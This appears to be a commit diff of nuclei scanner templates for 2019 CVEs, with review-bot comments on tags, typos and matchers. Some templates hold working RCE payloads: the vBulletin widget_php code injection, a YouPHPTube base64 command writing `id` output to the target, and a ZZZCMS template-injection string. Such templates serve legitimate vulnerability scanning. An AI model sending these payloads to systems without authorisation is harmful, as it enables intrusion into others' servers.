# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-14696
# Vendor Homepage: [https://open-school.org/]
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696
tags: cve,cve2019,xss
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
tags: cve,cve2019,xss
requests:
- method: GET


@ -3,21 +3,23 @@ info:
author: bing0o
name: Grafana unauthenticated API
severity: medium
tags: cve,cve2019,grafana
requests:
- body: >-
{"dashboard":
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
3600}
headers:
Content-Type: application/json
Host: '{{Hostname}}'
User-Agent: Mozilla/5.0
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers:
- part: body
type: word
words:
- deleteKey
method: POST
path:
- '{{BaseURL}}/api/snapshots'
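Review bot: `POST /api/snapshots` creates a persisted snapshot on every Grafana instance that matches and nothing cleans it up, even though the `deleteKey` the matcher looks for is exactly what the snapshot-delete endpoint needs; if this nuclei version lets an extractor feed a later raw request, extract `deleteKey` and follow up with a delete, otherwise add `intrusive` to the tags (as the rConfig template in this commit does) so the write is opt-in. The hard-coded `Content-Length: 235` does equal the length of the JSON body on the following line today, but it will silently break the request the first time someone edits the payload; a comment `# Content-Length must equal the JSON body below` next to it, or dropping the header if nuclei recomputes it, avoids that trap. The rewrite also dropped the `User-Agent` the old request set; harmless, but worth noting in the commit message since some WAF rules key on its absence.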


@ -4,9 +4,8 @@ info:
name: Webmin <= 1.920 Unauhenticated Remote Command Execution
author: bp0lr
severity: high
# Refrence:-https://www.exploit-db.com/exploits/47293
# Refrence:-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
tags: cve,cve2019,webmin,rce
requests:
- raw: #


@ -13,6 +13,7 @@ info:
Source/References:
- https://github.com/GeneralEG/CVE-2019-15858
tags: cve,cve2019,wordpress,wp-pluing,xss
requests:
- method: GET
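Review bot: `wp-pluing` in the new `tags:` line is a typo for `wp-plugin`, so `-tags wp-plugin` will never select this template even though the Yuzo (CVE-2019-11869) and Email Subscribers hunks in this same commit use the correct spelling; change the line to `tags: cve,cve2019,wordpress,wp-plugin,xss`. Tags are only ever matched by exact string, so a misspelt tag fails silently rather than erroring, which is why a small CI check that every tag comes from a known list would pay for itself here.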


@ -4,8 +4,8 @@ info:
author: pikpikcu
name: nostromo 1.9.6 - Remote Code Execution
severity: critical
# Source: https://www.exploit-db.com/raw/47837
reference: https://www.exploit-db.com/raw/47837
tags: cve,cve2019,rce
requests:
- raw:


@ -4,6 +4,7 @@ info:
name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
author: dwisiswant0
severity: high
tags: cve,cve2019,cisco
requests:
- method: GET


@ -4,7 +4,8 @@ info:
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
# Source:-https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
reference: https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
tags: cve,cve2019,rce,intrusive
requests:
- method: GET


@ -1,25 +0,0 @@
id: CVE-2019-16759-1
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"


@ -1,20 +1,20 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4
author: dwisiswant0
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
tags: cve,cve2019,vbulletin,rce
requests:
- raw:
- |
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
- |
POST / HTTP/1.1
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
matchers-condition: and
matchers:
- type: status
@ -22,4 +22,4 @@ requests:
- 200
- type: word
words:
- "nonexistent:1337"
- "PHP Version"


@ -5,9 +5,8 @@ info:
author: dwisiswant0
severity: critical
description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
# References:
# - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
tags: cve,cve2019,dlink,rce
requests:
- raw:


@ -4,7 +4,8 @@ info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: critical
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17382
tags: cve,cve2019,zabbix
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: critical
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
tags: cve,cve2019,dlink
requests:
- method: POST


@ -4,9 +4,10 @@ info:
name: Apache Solr 8.3.0 - Remote Code Execution via Velocity Template
author: pikpikcu
severity: critical
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce
# Refrense:https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
# https://nvd.nist.gov/vuln/detail/CVE-2019-17558
# Issues:-https://issues.apache.org/jira/browse/SOLR-13971
requests:
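Review bot: The added key `refrense:` on the `https://nvd.nist.gov/vuln/detail/CVE-2019-17558` line is misspelled; the other templates touched by this commit use `reference:` (the CVE-2019-17506 and CVE-2019-5127 sections, for instance), so anything reading `info.reference` sees no reference for this template. Change it to `reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558`. The same misspelling is introduced in the Openfire SSRF, WordPress Email Subscribers, Neon Dashboard, Atlassian Confluence (CVE-2019-3396) and Jira XSS sections, the Sell Media section uses `references:` (plural) and the eMerge E3 section uses `refrence:`; all of these should be `reference:`. This hunk also drops the gist and SOLR-13971 links the old comment block carried, which may be intentional but is worth confirming.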


@ -4,8 +4,8 @@ info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
severity: critical
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
refrense: https://swarm.ptsecurity.com/openfire-admin-console/
tags: cve,cve2019,ssrf
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
tags: cve,cve2019,citrix,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
tags: cve,cve2019,xss
requests:
- method: GET


@ -4,8 +4,8 @@ info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
refrense: https://www.exploit-db.com/exploits/48698
tags: cve,cve2019,wordpress,wp-plugin
requests:
- method: GET


@ -4,10 +4,10 @@ info:
name: Neon Dashboard - XSS Reflected
author: knassar702
severity: medium
description: |
An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
Source/References:
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
refrense: https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
tags: cve,cve2019,xss
requests:
- method: GET
path:


@ -4,6 +4,7 @@ info:
name: Oracle Business Intelligence Path Traversal
author: madrobot
severity: high
tags: cve,cve2019,oracle,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Oracle WebLogic Server - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,oracle,weblogic,rce
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.


@ -1,10 +1,10 @@
id: CVE-2019-3396
info:
author: "Harsh Bothra"
name: "Atlassian Confluence Path Traversal"
author: Harsh Bothra
name: Atlassian Confluence Path Traversal
severity: high
# https://github.com/x-f1v3/CVE-2019-3396
refrense: https://github.com/x-f1v3/CVE-2019-3396
tags: cve,cve2019,atlassian,confluence,traversal,rce
requests:
- raw:


@ -5,8 +5,8 @@ info:
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
# Source:- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
refrense: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
tags: cve,cve2019,atlassian,jira,xss
requests:
- method: GET


@ -3,6 +3,7 @@ info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
tags: cve,cve2019,traversal
requests:
- method: GET


@ -0,0 +1,34 @@
id: CVE-2019-5127
info:
name: YouPHPTube Encoder RCE
author: pikpikcu
severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-5127
tags: cve,cve2019,rce
requests:
- method: GET
path:
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}/objects/nuclei.txt"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "uid(.*)"
- "gid(.*)"
part: body
condition: and
- type: status
status:
- 200
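Review bot: The regex matcher on the `uid(.*)` and `gid(.*)` lines is unanchored and matches any body containing those substrings (`guid`, `fluid`, and so on), so an ordinary 200 page at `/objects/nuclei.txt` can be reported as a hit; patterns such as `- "uid=[0-9]+\\("` and `- "gid=[0-9]+\\("` would only match actual id(1) output. The `base64Url` value in the first request decodes to a command whose output is written to `nuclei.txt` under the target's `objects/` directory, so this check is intrusive and leaves an artifact on the host; that belongs in the `description` so operators know to clean up after a run. Indentation is lost in this rendering, so I cannot confirm that `matchers-condition` and `matchers` attach only to the second request, which is presumably the intent. Minor: `Content-Type: application/x-www-form-urlencoded` on a body-less GET does nothing, and the inline comments should be written `  # CVE-2019-5128` (two spaces before, one after the hash) per yamllint.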


@ -4,7 +4,8 @@ info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
# reference: https://github.com/omarkurt/CVE-2019-5418
reference: https://github.com/omarkurt/CVE-2019-5418
tags: cve,cve2019,rails,traversal
requests:
- method: GET


@ -4,14 +4,9 @@ info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
# A Cross-site scripting (XSS) vulnerability
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
# allows remote attackers to inject arbitrary web script or HTML
# via the keyword parameter (aka $search_term or the Search field).
# --
# References:
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
references: https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- method: GET


@ -6,7 +6,7 @@ info:
severity: critical
description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340
product: Drupal
tags: cve,cve2019,drupal,rce
requests:
- method: POST


@ -5,6 +5,7 @@ info:
author: randomrobbie
severity: high
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
tags: cve,cve2019,wordpress,wp-pluing,ssrf
requests:
- raw:
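Review bot: The added tag `wp-pluing` in `tags: cve,cve2019,wordpress,wp-pluing,ssrf` is misspelled; the other WordPress plugin templates in this commit use `wp-plugin`, so a run filtered on that tag silently skips this template. Change the line to `tags: cve,cve2019,wordpress,wp-plugin,ssrf`. The request block continues outside the hunk.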


@ -4,6 +4,7 @@ info:
name: Zarafa WebApp Reflected XSS
author: pd-team
severity: low
tags: cve,cve2019,zarafa,xss
requests:
- method: GET


@ -4,10 +4,11 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
refrence: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Refrence: https://www.exploit-db.com/exploits/47619
requests:
- raw: # Default Port


@ -4,6 +4,8 @@ info:
name: Kibana Timelion Arbitrary Code Execution
author: dwisiswant0
severity: critical
reference: https://github.com/mpgn/CVE-2019-7609
tags: cve,cve2019,kibana,rce
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
@ -11,9 +13,6 @@ info:
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
# --
# References:
# - https://github.com/mpgn/CVE-2019-7609
requests:
- method: POST


@ -3,11 +3,18 @@ info:
name: JIRA Directory Traversal
author: Kishore Krishna (siLLyDaddy)
severity: medium
tags: cve,cve2019,atlassian,jira,traversal
requests:
- method: GET
path:
- >-
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
- raw:
- |
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
@ -16,4 +23,4 @@ requests:
- type: word
words:
- <groupId>com.atlassian.jira</groupId>
part: body
part: body
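Review bot: The new raw request hard-codes `Accept-Encoding: deflate`, so a server that honors it returns a compressed body; unless the engine transparently inflates deflate responses, which I cannot confirm from here, the word matcher `<groupId>com.atlassian.jira</groupId>` never matches and the template reports nothing on vulnerable hosts. Drop that line or use `Accept-Encoding: identity`. Replacing the `{{BaseURL}}` path with a raw `GET /s/anything/...` also discards any base path in the target URL that the old form preserved; if the switch was made to avoid path normalization of the `/_/` segment, a comment above `- raw:` saying so would spare the next maintainer the guesswork. The matcher block in the second hunk continues from the first, and the change to the final `part: body` line appears to be whitespace only.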


@ -4,8 +4,8 @@ info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
reference: https://www.doyler.net/security-not-included/more-jira-enumeration
tags: cve,cve2019,atlassian,jira
requests:
- method: GET


@ -2,8 +2,10 @@ id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: "TechbrunchFR"
author: TechbrunchFR
severity: medium
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
tags: cve,cve2019,atlassian,jira,ssrf
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
@ -13,7 +15,6 @@ info:
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817


@ -4,6 +4,7 @@ info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
tags: cve,cve2019,totaljs,traversal
requests:
- method: GET


@ -3,6 +3,7 @@ info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: high
tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
- method: GET


@ -0,0 +1,28 @@
id: CVE-2019-9041
info:
name: ZZZCMS 1.6.1 RCE
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-9041
tags: cve,cve2019,zzzcms,rce
requests:
- method: POST
path:
- "{{BaseURL}}/search/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
part: body
- type: status
status:
- 200
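Review bot: The word matcher lists `phpinfo` and `PHP Version` with no `condition:`, so either string on its own satisfies it, and a response that merely mentions phpinfo in an error or help text is reported as code execution. Add `condition: and` under `part: body`, as the regex matcher in the CVE-2019-5127 template in this commit does, or keep only `PHP Version`. Also, `body: |` keeps a trailing newline in the POST body; `body: |-` sends exactly the form string.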


@ -2,9 +2,10 @@ id: CVE-2019-9670
info:
name: Zimbra Collaboration XXE
description: "mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability."
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
author: ree4pwn
severity: critical
tags: cve,cve2019,zimbra,xxe
requests:
- raw:


@ -3,6 +3,8 @@ info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
severity: critical
tags: cve,cve2019,artifactory
requests:
- raw:
- |
